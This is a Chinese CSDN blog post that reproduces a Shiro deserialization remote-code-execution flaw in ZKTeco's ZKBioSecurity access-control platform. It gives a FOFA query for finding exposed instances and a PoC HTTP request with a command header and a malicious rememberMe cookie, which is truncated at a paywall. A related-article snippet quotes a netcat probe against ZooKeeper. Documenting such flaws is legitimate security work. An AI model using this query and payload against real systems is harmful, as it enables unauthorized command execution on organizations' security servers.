Zkteco百傲瑞达安防管理系统平台 Shiro反序列化漏洞复现

已于 2023-12-02 03:43:27 修改
阅读量1k 收藏 10
点赞数 9
分类专栏: 漏洞复现 文章标签: 安全
于 2023-12-02 03:40:35 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41904294/article/details/134746843
版权

0x01 产品简介

  百傲瑞达是基于生物识别技术打造的一站式安防软件服务平台,平台涵盖人事管理、门禁管理、梯控管理、访客管理、视频联动、系统设置等模块,门禁配合通道管理设备可实现对出入口进行控制,可以深度应用于政府、企业、监狱、学校、智慧社区等多个安防需求领域

0x02 漏洞概述

 Zkteco 百傲瑞达安防管理系统平台存在 shiro 反序列化漏洞,该漏洞源于软件存在硬编码的 shiro-key,攻击者可利用该 key 生成恶意的序列化数据,在服务器上执行任意代码,执行系统命令、或打入内存马等,获取服务器权限。

0x03 复现环境

FOFA:title=="ZKBioSecurity" && body="Automatic login within two weeks"  

0x04 漏洞复现

PoC

GET / HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Cmd: whoami
Cookie: rememberMe=kPH+bIxk5D2deZiIxcaaaExg7EWKTeFZkFrgR4FfAGBNnoSgHEfKEsBMQECJwt+ceZp4VwLFx5XJDaWao1Fbavx7SZ+t7zGnhcx3V90PiU6V/R+669FmF/RmR
了解本专栏 订阅专栏 解锁全文 超级会员免费看
0xSecl
关注
  • 9
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
订阅专栏
POC_百傲瑞达
LiBai'S BLOG
01-13 4233
百傲瑞达V5000 HTTP admin admin Administrator 指纹识别 zkteco-security-management-system POC 自己编写 name: poc-yaml-zkteco-security-management-system-default-password level: 2 finger: | "zkteco-security-management-system" in finger.name rules: - method: POST .
百傲瑞达5000 biosecurity_v5000_x64_product_ZKBioSecurity_3.3.0_R_2020-05-15-1125
10-04
百傲瑞达5000 biosecurity_v5000_x64_product_ZKBioSecurity_3.3.0_R_2020-05-15-1125 门禁,梯控,消费,考勤,会议。单软件
百傲瑞达用户手册
05-07
百傲瑞达用户手册( 梯控,消费) - 2018-1-8终极版
聊聊Shiro反序列化漏洞,以及内存马技术!
A_991128a的博客
05-14 1053
0x01 Filter工作原理它与Servlet类似,也是由Servlet 容器进行调用和执行的,一般用于进行请求过滤,如权限控制编码/敏感过滤等等。当在 web.xml 注册了一个Filter来对某个Servlet程序进行拦截处理时,它可以决定是否将请求继续传递给Servlet程序,以及对请求和响应消息是否进行预修改。0x02 Filter 链在一个 Web 应用程序中可以注册多个Filter程序,每个 Filter 程序都可以对一个或一组Servlet程序进行拦截。
今天,咱不讲三国,就聊聊Shiro反序列化漏洞,以及内存马技术!
localhost01
07-15 7712
Shiro反序列化漏洞 漏洞介绍 上图为Shiro默认的登录页面,页面可见:Shiro提供了记住我(RememberMe)的功能。 然而,Shiro对rememberMe的cookie做了加密处理,shiro在CookieRememberMeManaer类中将cookie中rememberMe字段内容分别进行:序列化、AES加密、Base64编码,三个操作。 而在识别身份的时候,则需要对Cookie里的rememberMe字段进行逆操作: Base64解码 AES解密 反序列化 由于AES加密的密钥K
无胁科技-TVD每日漏洞情报-2022-10-28
wuthreat无胁科技的博客
10-28 485
参考链接:https://tvd.wuthreat.com/#/listDetail?参考链接:https://tvd.wuthreat.com/#/listDetail?参考链接:https://tvd.wuthreat.com/#/listDetail?参考链接:https://tvd.wuthreat.com/#/listDetail?参考链接:https://tvd.wuthreat.com/#/listDetail?漏洞编号:CVE-2022-24082;漏洞编号:CVE-2022-42953;
POC_百傲瑞达_百傲瑞达漏洞,关于网络安全性能优化的几点建议
java_dazhuzhu的博客
04-17 319
从网页网页源代码中找唯一标识-finger。
Shiro 反序列化漏洞复现
weixin_51559599的博客
12-08 870
在 Apache shiro 的框架中,执行身份验证时提供了一个记住密码的功能(RememberMe),如果用户登录时勾选了这个选项。用户的请求数据包中将会在 cookie 字段多出一段数据,这一段数据包含了用户的身份信息,且是经过加密的。加密的过程是:用户信息=>序列化=>AES加密(这一步需要用密钥key)=>base64编码=>添加到 RememberMe Cookie 字段。勾选记住密码之后,下次登录时,服务端会根据客户端请求包中的 cookie 值进行身份验证,无需登录即可访问。
漏洞复现Shiro 反序列化漏洞
2301_80115097的博客
11-08 2129
Apache Shiro是一款开源安全框架,提供身份验证、授权、密码学和会话管理。Shiro框架直观、易用,同时也能提供健壮的安全性。Apache Shiro 1.2.4及以前版本中,加密的用户信息序列化后存储在名为remember-me的Cookie中。攻击者可以使用Shiro的默认密钥伪造用户Cookie,触发Java反序列化漏洞,进而在目标机器上执行任意命令。该款工具特别适合初学者,配置了各种OA漏洞利用板块,还有shiro、struts2等框架漏洞漏洞利用板块,还有一键执行命令的功能!!
黑客入侵企业级认证服务器 获取明文密码
weixin_34290352的博客
07-03 475
国家信息安全漏洞共享平台上周共收集、整理信息安全漏洞298个,互联网上出现“ZKTecoZKBioSecurity 3.0硬编码证书远程系统命令执行漏洞”零日代码攻击漏洞,上周信息安全漏洞威胁整体评价级别为中。中国电子银行网为您梳理过去一周的信息安全行业要闻,并特约中国金融认证中心(CFCA)信息安全专家对漏洞风险作出点评和建议。 一周信息安全要闻速览 ...
漏洞扫描,zookeeper未授权访问漏洞复现及修复
ChaoandPeng的博客
06-29 5298
ZooKeeper默认开启在2181端口,在未进行任何访问控制情况下,攻击者可通过执行envi命令获得系统大量的敏感信息,包括系统名称、Java环境。0x00 ZooKeeper 安装: Zookeeper的默认开放端口是2181wget https://mirrors.tuna.tsinghua.edu.cn/apache/zookeeper/zookeeper-3.4.10/zookeeper-3.4.10.tar.gztar -zxvf zookeepre-3.4.10.tar.gz cd zooke
zookeeper未授权漏洞实战+复现
我的博客
05-12 7797
测试授权目标时,通过工具扫描出了zookeeper未授权(CVE-2014-085) 之后就是进行漏洞利用 由于目标系统较敏感,没有执行其它操作,所以准备本地复现 Zookeeper安装部署之后默认情况下不需要任何身份验证,造成攻击者可以远程利用Zookeeper,安装zookeeper后 默认端口为2181 这个为配置文件 直接进行漏洞利用 echo envi |nc xxxxx 2181 直接输出目标服务器环境信息,非常详细 os名称 版本 服务器名称 版本...
捷配总结的SMT工厂安全防静电规则
tyymm的博客
07-17 605
SMT工厂须熟记的安全防静电规则! 安全对于我们非常重要,特别是我们这种SMT加工厂,通常我们所讲的安全是指人身安全。 但这里我们须树立一个较为全面的安全常识就是在强调人身安全的同时亦必须注意设备、产品的安全。 电气: 怎样预防人身触电事故? 1、发现有损坏的开关,电线等电气安全隐患,赶快向有关人员报告处理。2、不懂电气技术的人对电气设备不要乱装、乱拆。3、不要用湿手、湿脚动用电气设备(如: 按开关、按钮)。4、清扫卫生时,不要用湿抹布擦电线、开关按钮,一定要搞卫生,请先断开电
AI安全系列——[第五空间 2022]AI(持续更新)
2201_76139143的博客
07-15 1014
最近很长时间没有更新,其实一直在学习AI安全,我原以为学完深度学习之后再学AI安全会更加简单些,但是事实证明理论转实践还是挺困难的,但是请你一定要坚持下去,因为“不是所有的坚持都有结果,但总有一些坚持,能从冰封的土地里,培育出十万朵怒放的蔷薇”题目来源:NSSCTF题目描述:噪声在大数据场景下有着重要的地位。工程师们苦于被噪声污染的数据,同时也使用噪声保护着隐私数据。这个挑战分为两个部分。挑战1:从噪声中恢复隐私向量有A,B两个实体。其中B是普通实体,A则是恶意攻击者。
OWASP 移动应用 2024 十大安全风险
shendong70的博客
07-14 1261
随着智能手机的快速发展,移动应用已经成为我们日常生活关系最密切的软件应用。开放全球应用程序安全项目(OWASP)基金会,致力于提高软件的安全性。自 2014、2016年发布了移动应用的十大风险后,今年再次发布2024版。这对移动应用软件的检查工具有着重要的指导作用。
浅谈安数云智能安全运营管理平台:DCS-SOAR
2401_82472120的博客
07-15 870
安数云DCS-SOAR平台致力于解决用户云上资产的安全运营问题,面对用户防护设备繁杂臃肿、安全事件难以及时响应、运营成本逐年上升的困境,安数云DCS-SOAR平台安全大脑驱动为核心,建立运营体系,通过OneStep框架实现第三方安全产品的“无门槛接入、低门槛纳管”;威胁和告警数量不断增长,资源又不足以应对所有问题,在日常运营中,分析人员需要快速决定哪些告警需要处理,哪些可以忽略,但由于超负荷工作,很可能错过真正的威胁,在应对威胁和恶意攻击时出现误判,最终使网络及数据产生安全泄露,造成无可挽回的损失。
高性能、安全、低碳绿色的趋势下,锐捷网络发布三擎云办公解决方案 3.0
最新发布
CSDN云计算
07-18 852
去确保性能体验流畅。与上一代产品相比,三擎云办公 3.0 新增 130+功能特性,不仅充分对标了主流云桌面平台的核心功能,如热补丁升级与第三方存储和计算平台支持,还通过一系列创新技术,如智能透明加密技术,独享应用虚拟化技术,增强协议技术,智能 IO 调度技术等,在体验、安全、降本、增效等多个维度上展现出差异化优势。近日,锐捷网络重磅发布了三擎云办公解决方案 3.0,针对新趋势下挑战,一口气推出了 130 多项功能特性,希望为用户构建一个集安全、高效、体验于一身,实现成本优化的云桌面办公系统环境。
高效守护:在Eureka中构筑服务的分布式安全防线
2401_85341950的博客
07-15 951
通过上述步骤和代码示例,我们展示了如何在Eureka中实现服务的分布式安全策略。这包括服务认证、授权机制的实现,以及数据传输加密等关键安全措施。Eureka作为服务发现框架,在分布式安全体系中发挥着核心作用。在微服务架构中,服务的安全性不容小觑。通过本文的介绍,我们希望能够帮助读者更好地理解和实现Eureka中的分布式安全策略,确保微服务之间的通信安全,构建一个更加安全、可靠的系统。注意:本文中的代码示例为简化模型,实际应用中应根据具体需求和安全标准进行选择和实现。
shiro反序列化漏洞复现
07-28
Apache Shiro反序列化漏洞是指攻击者可以利用Shiro框架中的反序列化漏洞,通过构造恶意的序列化数据,来执行任意代码或者获取敏感信息的漏洞。攻击者可以通过发送恶意请求或者利用其他漏洞来触发该漏洞,从而实现攻击目的。为了防止该漏洞的利用,建议及时更新Shiro框架版本,并加强对系统的安全防护措施。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

0xSecl

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值